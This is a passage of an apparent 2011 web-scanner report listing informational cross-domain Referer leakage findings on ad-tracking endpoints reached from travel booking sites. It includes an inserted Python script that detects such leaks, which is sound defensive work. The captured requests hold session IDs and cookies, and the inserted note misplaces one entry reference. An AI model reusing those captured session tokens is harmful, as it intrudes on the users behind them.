<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><iframe width="1" height="1" frameborder="0" scrolling="no" src="http://pm.dp.yieldmanager.net/PixelMonkey?adId=expedia&format=html&useReferrer=1&force_segment=Infosite_US"></iframe>
...[SNIP]...

19.132. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /activityi;src=2588797;type=nausc826;cat=nauss008;ord=2134735815;u=ccf4a420af8b480f8413efb42e880287;u1=Hotel;u2=178239;u4=20111004%7C20111007;u6=1;u7=1%7C0;u9=;u11=0;u12=;u13=4215%7C15861%7C23415%7C1680030%7C2800816;u14=429.0%7C339.15%7C289.0%7C432.33%7C308.54;u16=USD HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 00:10:36 GMT
Expires: Mon, 03 Oct 2011 00:10:36 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 752
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><IFRAME width="1" height="1" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"
src="http://tags.bluekai.com/site/2625?ret=html&phint=u1=Hotel&phint=u2=178239&phint=u3=&phint=u4=20111004%7C20111007&phint=u5=&phint=u6=1&phint=u7=1%7C0&phint=u8=&phint=u9=&phint=u10=&phint=u11=0&phint=u12=&phint=u13=4215%7C15861%7C23415%7C1680030%7C2800816&phint=u14=429.0%7C339.15%7C289.0%7C432.33%7C308.54&phint=u16=USD&phint=u20=">
</IFRAME><script type="text/javascript"
src="http://a.cdn.intentmedia.net/javascripts/intent_media_expedia_beacon.js">

</script>
...[SNIP]...
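Added example, not part of the XSS.CX/Burp report: a small Python check that reproduces the finding above offline. It parses a captured response for src, href and action attributes, resolves them against the request URL, keeps those that point at a host other than the one the request went to, and reports whether the request URL carried ';'-style path parameters or a query string that a browser would place in the Referer header it sends to those hosts. The request URL and response body below are a constructed sample modelled on the DoubleClick entries in this section, not the live capture, and the function names are mine. The Referer rule it assumes is the browser default of the time (no-referrer-when-downgrade): the header is sent except from an https: page to an http: resource.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample modelled on the Floodlight entries above (not the live capture).
# The request carries its data as ';'-separated path parameters and an empty
# query string; the response embeds two third-party resources and two same-host ones.
SAMPLE_REQUEST_URL = (
    "http://fls.doubleclick.net/activityi;src=2588797;type=nausc826;"
    "u9=Hotel%20Commonwealth;u14=209;ord=6847542107570.916?"
)
SAMPLE_RESPONSE = """<html><body style="background-color: transparent">
<IFRAME width="1" height="1" src="http://tags.bluekai.com/site/2565?ret=html&phint=u9=Hotel%20Commonwealth"></IFRAME>
<script type="text/javascript" src="http://a.cdn.intentmedia.net/javascripts/intent_media_expedia_beacon.js"></script>
<img src="/pixel.gif"><a href="https://fls.doubleclick.net/activityi">same host</a>
</body></html>"""


class _LinkCollector(HTMLParser):
    """Collect every src, href and action attribute value in a document."""

    LINK_ATTRS = {"src", "href", "action"}

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names, so <IFRAME SRC=...> is handled too.
        for name, value in attrs:
            if name in self.LINK_ATTRS and value:
                self.links.append(value)


def referer_payload(url):
    """Return the parts of a URL beyond the plain path that end up in a Referer header:
    ';'-style path parameters and the query string. The fragment is never sent."""
    parts = urlsplit(url)  # urlsplit keeps ';params' inside .path
    path_params = parts.path.split(";", 1)[1] if ";" in parts.path else ""
    return path_params, parts.query


def cross_domain_links(request_url, html):
    """Absolute http(s) links in the response whose host differs from the request host."""
    origin_host = urlsplit(request_url).hostname
    collector = _LinkCollector()
    collector.feed(html)
    out = []
    for link in collector.links:
        absolute = urljoin(request_url, link)  # resolves relative and scheme-relative (//host/) links
        target = urlsplit(absolute)
        if target.scheme in ("http", "https") and target.hostname and target.hostname != origin_host:
            out.append(absolute)
    return out


def referer_sent(request_url, target_url):
    """Whether a browser on the default policy of the time (no-referrer-when-downgrade)
    sends a Referer at all: it is suppressed only for an https: page loading an http: resource."""
    return not (urlsplit(request_url).scheme == "https" and urlsplit(target_url).scheme == "http")


def referer_leak_report(request_url, html):
    """Reproduce the scanner's check: parameterised request URL plus third-party links in the response."""
    path_params, query = referer_payload(request_url)
    third_party = [u for u in cross_domain_links(request_url, html) if referer_sent(request_url, u)]
    return {
        "path_params": path_params,
        "query": query,
        "third_party": third_party,
        "leaks": bool(path_params or query) and bool(third_party),
    }


if __name__ == "__main__":
    report = referer_leak_report(SAMPLE_REQUEST_URL, SAMPLE_RESPONSE)
    for target in report["third_party"]:
        print("Referer carrying", repr(report["path_params"] or report["query"]),
              "would be sent to", urlsplit(target).hostname)
```

Run against the sample, the report flags both bluekai.com and intentmedia.net as recipients of the full request URL, including the hotel name and rate in the path parameters, while the same-host image and link are ignored. Note that entry 19.134 above has an empty query string (a trailing "?"), so a check that looked only at the query would miss it; this is why the path parameters are inspected as well.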

19.133. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string, and the response contains a link to another domain (see the response body below). When the browser loads that linked resource it may send the query-string parameters to the other domain in the Referer header.

Request

GET /activityi;src=2588783;type=nausc547;cat=nauss482;ord=2134735815;u=ccf4a420af8b480f8413efb42e880287;u1=Hotel;u2=178239;u4=20111004%7C20111007;u6=1;u7=1%7C0;u9=;u11=0;u12=;u13=4215%7C15861%7C23415%7C1680030%7C2800816;u14=429.0%7C339.15%7C289.0%7C432.33%7C308.54;u16=USD HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 00:10:36 GMT
Expires: Mon, 03 Oct 2011 00:10:36 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 2825
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent">
<iframe width="1" height="1" frameborder="0" scrolling="no" src="http://pm.dp.yieldmanager.net/PixelMonkey?adId=expedia&format=html&useReferrer=1&force_segment=Searchresults_US"></iframe>
...[SNIP]...

19.134. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string, and the response contains links to other domains (see the response body below). When the browser loads those linked resources it may send the query-string parameters to the other domains in the Referer header.

Request

GET /activityi;src=2588797;type=nausc826;cat=nausi956;u=CCF4A420AF8B480F8413EFB42E880287;u1=Hotel;u4=20111014%7C20111016;u2=178239;u6=1;u7=2%7C0;u9=Hotel%20Commonwealth;u11=40;u13=894999;u14=209;u16=USD;ord=6847542107570.916? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information?icmcid=TRIPA.Expedia_US-H_B4.11893.T&icmdtl=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..&chkin=10/14/11&hashTag=roomsAndRates&chkout=10/16/11&eapid=21187-1&rm1=a2&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 01:02:12 GMT
Expires: Mon, 03 Oct 2011 01:02:12 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 635
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><IFRAME width="1" height="1" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" src="http://tags.bluekai.com/site/2565?ret=html&phint=u1=Hotel&phint=u2=178239&phint=u4=20111014%7C20111016&phint=u6=1&phint=u7=2%7C0&phint=u9=Hotel%20Commonwealth&phint=u11=40&phint=u13=894999&phint=u14=209&phint=u15="></IFRAME><script type="text/javascript"
src="http://a.cdn.intentmedia.net/javascripts/intent_media_expedia_beacon.js">

</script>
...[SNIP]...

19.135. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string, and the response contains links to other domains (see the response body below). When the browser loads those linked resources it may send the query-string parameters to the other domains in the Referer header.

Request

GET /activityi;src=1653087;type=hotel756;cat=hotel329;u2=BOS;u3=unknown;u4=unknown;u5=0;u6=0;u7=55.26;u13=1;u15=US;u16=34A63N3;ord=1;num=418599216785? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 00:09:00 GMT
Expires: Mon, 03 Oct 2011 00:09:00 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 2360
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><IMG src='http://ats.tumri.net/ats/ats?cmd=RT&AdvertiserID=3052&platform=T&ActionID=17&ActionName=RTALL&ut1=HOTEL;&ut2=&ut3=BOS&ut4=&ut5=US&cachebuster=1230846595' height='1' width='1' /><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=trv_cs=7[504]&betq=9669=409042[504]" width = "1" height = "1" border = "0"><iframe id="ad_frame" frameborder="0" width="1" height="1" style="margin:0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" src="http://www.tumri.net/ads/ads?ad_cl=3052&ad_se=http://www.tumri.net&lo_id=108455&ad_ty=onebyone&height=1&width=1&f1=,BOS&f2=,unknown&f3=,0&f4=,HOTEL&f5=,0&u1=&u2=BOS&u3=unknown&u4=unknown&u5=0&u6=0&u7=55.26">
</iframe><img src="http://ad.yieldmanager.com/pixel?id=109007&t=2" width="1" height="1" /><img src="http://ad.yieldmanager.com/unpixel?id=99271&id=109003&id=99259&id=99270&id=109004&id=99267&id=99268&id=99269&id=99263&id=99265&id=99260&id=99258&id=99255&id=109001&id=109002&id=99266&id=109008&id=99257&id=109005&id=109006&id=109010&id=109009&id=99262&id=99261&id=99256&id=99264&id=567382&id=567385&id=567384&id=567393&id=111327&id=111326" width="1" height="1" /> <!-- HTTP Search Pixel - Call from DFA Floodlight on LOBs -->
...[SNIP]...
<!-- Please do not modify Smart Pixel -->
<iframe src="http://yahoo.ytsa.net/tase/int?adv=18&fmt=html&pid=search&sec=0&dclk=hotel756;cat=hotel329;u2=BOS;u3=unknown;u4=unknown;u5=0;u6=0;u7=55.26;u13=1;u15=US;u16=34A63N3;ord=1;num=418599216785 width="1" height="1" align="center" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"></iframe>
<!-- Please do not modify Smart Pixel --><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=trv_cs=7[336]&betq=9669=409042[336]" width = "1" height = "1" border = "0"><img src="http://ad.yieldmanager.com/pixel?id=902859&t=2" width = "1" height = "1" border = "0"><img width="1" height="1" border="0" alt="" src="http://pm.dp.yieldmanager.net/PixelMonkey?adId=travelocityhotels&format=image&useReferrer=1"/><img src="http://ads.bluelithium.com/pixel?id=1409010&t=2" width="1" height="1" /></body>
...[SNIP]...

19.136. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string, and the response contains links to other domains (see the response body below). When the browser loads those linked resources it may send the query-string parameters to the other domains in the Referer header.

Request

GET /activityi;src=1653087;type=hotel756;cat=hotel329;u2=BOS;u3=unknown;u4=unknown;u5=0;u6=0;u7=55.26;u13=1;u15=US;u16=34A63N3;ord=1;num=058307050719? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 00:13:23 GMT
Expires: Mon, 03 Oct 2011 00:13:23 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 2359
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><IMG src='http://ats.tumri.net/ats/ats?cmd=RT&AdvertiserID=3052&platform=T&ActionID=17&ActionName=RTALL&ut1=HOTEL;&ut2=&ut3=BOS&ut4=&ut5=US&cachebuster=458476618' height='1' width='1' /><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=trv_cs=7[504]&betq=9669=409042[504]" width = "1" height = "1" border = "0"><iframe id="ad_frame" frameborder="0" width="1" height="1" style="margin:0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" src="http://www.tumri.net/ads/ads?ad_cl=3052&ad_se=http://www.tumri.net&lo_id=108455&ad_ty=onebyone&height=1&width=1&f1=,BOS&f2=,unknown&f3=,0&f4=,HOTEL&f5=,0&u1=&u2=BOS&u3=unknown&u4=unknown&u5=0&u6=0&u7=55.26">
</iframe><img src="http://ad.yieldmanager.com/pixel?id=109007&t=2" width="1" height="1" /><img src="http://ad.yieldmanager.com/unpixel?id=99271&id=109003&id=99259&id=99270&id=109004&id=99267&id=99268&id=99269&id=99263&id=99265&id=99260&id=99258&id=99255&id=109001&id=109002&id=99266&id=109008&id=99257&id=109005&id=109006&id=109010&id=109009&id=99262&id=99261&id=99256&id=99264&id=567382&id=567385&id=567384&id=567393&id=111327&id=111326" width="1" height="1" /> <!-- HTTP Search Pixel - Call from DFA Floodlight on LOBs -->
...[SNIP]...
<!-- Please do not modify Smart Pixel -->
<iframe src="http://yahoo.ytsa.net/tase/int?adv=18&fmt=html&pid=search&sec=0&dclk=hotel756;cat=hotel329;u2=BOS;u3=unknown;u4=unknown;u5=0;u6=0;u7=55.26;u13=1;u15=US;u16=34A63N3;ord=1;num=058307050719 width="1" height="1" align="center" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"></iframe>
<!-- Please do not modify Smart Pixel --><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=trv_cs=7[336]&betq=9669=409042[336]" width = "1" height = "1" border = "0"><img src="http://ad.yieldmanager.com/pixel?id=902859&t=2" width = "1" height = "1" border = "0"><img width="1" height="1" border="0" alt="" src="http://pm.dp.yieldmanager.net/PixelMonkey?adId=travelocityhotels&format=image&useReferrer=1"/><img src="http://ads.bluelithium.com/pixel?id=1409010&t=2" width="1" height="1" /></body>
...[SNIP]...

19.137. https://go.americanexpress-travel.com/hotel/HotelCobrand.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://go.americanexpress-travel.com
Path:   /hotel/HotelCobrand.do

Issue detail

The page was loaded from a URL containing a query string, and the response contains links to other domains (see the response body below). When the browser loads those linked resources it may send the query-string parameters to the other domains in the Referer header.

Request

GET /hotel/HotelCobrand.do;jsessionid=959CC77E68C7D0C1E45369CF857BC3F1.p0716?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot HTTP/1.1
Host: go.americanexpress-travel.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=amex&grp=21&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B206380952%3B28845483%3Bq%3Fhttp%3A%2F%2Fgo.americanexpress-travel.com%2Fhotel%2FHotelCobrand.do%3FService%3DAMEX%26leavingDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26returningDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26searchMode%3Dcity%26city%3D%24%7Bcity%7D%2C%2520%24%7Bcountryn%7D%26cityCountryCode%3D%26hotelName%3D%26adults%3D%24%7Badults%7D%26%3FService%3DAMEX%26WA1%3D03010%26WA2%3D%25eaid%26WA4%3D%25ecid%26cmpid%3Daf-ctn-af000063%26widgetid%3Dratefind-hot&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=141&pos=2&aii=2943600b-8719-4374-99f1-66c3d37bf8d3&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tyrg1st=5CE502CBA48A0513; JSID=959CC77E68C7D0C1E45369CF857BC3F1.p0716; TUID=987675b9-11f8-46ee-8be4-90a9f5cad5fa; JSESSIONID=959CC77E68C7D0C1E45369CF857BC3F1.p0716; Service=AMEX

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=F117AC921CCE045ED73E1F0312D428B7.p0716; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7238

<!-- PAGE: TimeKeeper -->
<link rel="icon" href="https://axptravel.americanexpress.com/ctnwt/favicon.ico"/>
<link rel="shortcut icon" href="https://axptravel.americanexpress.com/ctnwt/favicon.ico"/>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
...[SNIP]...
<NOSCRIPT>
<IMG SRC="https://ad.doubleclick.net/activity;src=189445;type=2004c410;cat=hotel343;ord=1;num=1?" WIDTH=1 HEIGHT=1 BORDER=0>
</NOSCRIPT>
...[SNIP]...
<NOSCRIPT>
<IMG SRC="https://ad.doubleclick.net/activity;src=1051924;type=consu114;cat=cruis785;ord=1;num='" WIDTH=1 HEIGHT=1 BORDER=0>
</NOSCRIPT>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="https://fls.doubleclick.net/activityi;src=1174169;type=2004c714;cat=hotel322;ord=1;num=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
</div>
<script type="text/javascript" src="https://axptravel.americanexpress.com/ctnwt/theme/shared/js/icrossing/ctniclive.js"></script>
...[SNIP]...

19.138. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string, and the response contains a link to another domain (see the response body below). When the browser loads that linked resource it may send the query-string parameters to the other domain in the Referer header.

Request

GET /pagead/ads?client=ca-pub-0666653885873574&output=html&h=250&slotname=7372794801&w=300&ea=0&flash=10.3.183&url=http%3A%2F%2Fads.pubmatic.com%2Fhosteddefaulttags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&dt=1317606797018&bpp=7&shv=r20110921&jsv=r20110914&correlator=1317606797027&frm=8&adk=4114293891&ga_vid=1069027809.1317606797&ga_sid=1317606797&ga_hid=1887245699&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&dff=times%20new%20roman&dfs=16&adx=0&ady=0&biw=-12245933&bih=-12245933&ifk=2019610879&loc=http%3A%2F%2Fads.pubmatic.com%2FHostedDefaultTags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=12 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 03 Oct 2011 01:53:13 GMT
Server: cafe
Cache-Control: private
Content-Length: 1263
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
< - DO NOT MODIFY -->
<SCRIPT SRC="http://ad.dedicatedmedia.com/ttj?id=562058&cb=592559840&pubclick=http://adclick.g.doubleclick.net/aclk?sa=l&ai=ByqSqiRWJTs3sEc2oqwGP1s3TDPWyn_oBtZyU8CPNl96RbgAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0wNjY2NjUzODg1ODczNTc0oAGZgO_qA7IBEGFkcy5wdWJtYXRpYy5jb226AQozMDB4MjUwX2FzyAEJ2gFKaHR0cDovL2Fkcy5wdWJtYXRpYy5jb20vaG9zdGVkZGVmYXVsdHRhZ3MvMjY2MjAvMjY2MjEvMjE1NTYvNTU5L2FkdGFnLmh0bWyYAvoBwAIEyALvpLwLqAMB9QMAAABE&num=1&sig=AOD64_21y1nu5mWiQMOEeNytMeOPMZRuvg&client=ca-pub-0666653885873574&adurl=" TYPE="text/javascript"></SCRIPT>
...[SNIP]...

19.139. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string, and the response contains a link to another domain (see the response body below). When the browser loads that linked resource it may send the query-string parameters to the other domain in the Referer header.

Request

GET /pagead/ads?client=ca-pub-0666653885873574&output=html&h=250&slotname=7372794801&w=300&ea=0&flash=10.3.183&url=http%3A%2F%2Fads.pubmatic.com%2Fhosteddefaulttags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&dt=1317606797018&bpp=7&shv=r20110921&jsv=r20110914&correlator=1317606797027&frm=8&adk=4114293891&ga_vid=1069027809.1317606797&ga_sid=1317606797&ga_hid=1887245699&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&dff=times%20new%20roman&dfs=16&adx=0&ady=0&biw=-12245933&bih=-12245933&ifk=2019610879&loc=http%3A%2F%2Fads.pubmatic.com%2FHostedDefaultTags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=12 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0666653885873574&output=html&h=250&slotname=7372794801&w=300&ea=0&flash=10.3.183&url=http%3A%2F%2Fads.pubmatic.com%2Fhosteddefaulttags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&dt=1317606797018&bpp=7&shv=r20110921&jsv=r20110914&correlator=1317606797027&frm=8&adk=4114293891&ga_vid=1069027809.1317606797&ga_sid=1317606797&ga_hid=1887245699&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&dff=times%20new%20roman&dfs=16&adx=0&ady=0&biw=-12245933&bih=-12245933&ifk=2019610879&loc=http%3A%2F%2Fads.pubmatic.com%2FHostedDefaultTags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=12
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 03 Oct 2011 01:53:23 GMT
Server: cafe
Cache-Control: private
Content-Length: 1264
